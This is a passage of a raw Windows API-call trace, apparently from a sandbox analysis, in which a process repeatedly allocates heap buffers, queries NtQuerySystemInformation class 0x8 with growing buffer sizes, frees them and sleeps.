0xc0000004 [0302.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0302.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0302.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0302.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.973] Sleep (dwMilliseconds=0x110) [0302.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0302.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0302.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0302.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0302.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0302.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0302.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0302.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0302.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.989] Sleep (dwMilliseconds=0x110) [0303.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0303.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0303.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0303.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0303.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0303.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0303.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0303.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0303.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.005] Sleep (dwMilliseconds=0x110) [0303.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0303.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0303.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0303.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0303.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0303.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0303.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.020] Sleep (dwMilliseconds=0x110) [0303.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0303.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0303.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0303.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0303.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0303.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0303.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.033] Sleep (dwMilliseconds=0x110) [0303.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0303.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0303.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0303.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0303.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0303.053] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.054] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0303.054] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0303.054] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.055] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0303.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.061] Sleep (dwMilliseconds=0x110) [0303.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0303.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0303.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0303.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0303.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0303.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0303.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0303.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0303.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.086] Sleep (dwMilliseconds=0x110) [0303.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0303.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0303.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0303.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0303.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0303.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0303.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.095] Sleep (dwMilliseconds=0x110) [0303.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0303.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0303.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0303.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0303.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0303.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0303.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0303.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0303.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.115] Sleep (dwMilliseconds=0x110) [0303.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0303.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0303.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0303.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0303.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0303.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0303.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.129] Sleep (dwMilliseconds=0x110) [0303.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0303.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0303.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0303.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0303.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0303.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0303.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0303.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0303.146] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.147] Sleep (dwMilliseconds=0x110) [0303.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0303.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0303.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0303.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0303.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0303.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0303.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0303.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0303.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.162] Sleep (dwMilliseconds=0x110) [0303.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0303.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0303.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0303.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0303.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0303.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0303.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0303.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0303.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.177] Sleep (dwMilliseconds=0x110) [0303.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0303.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0303.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0303.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0303.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0303.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0303.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0303.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0303.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.192] Sleep (dwMilliseconds=0x110) [0303.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0303.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0303.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 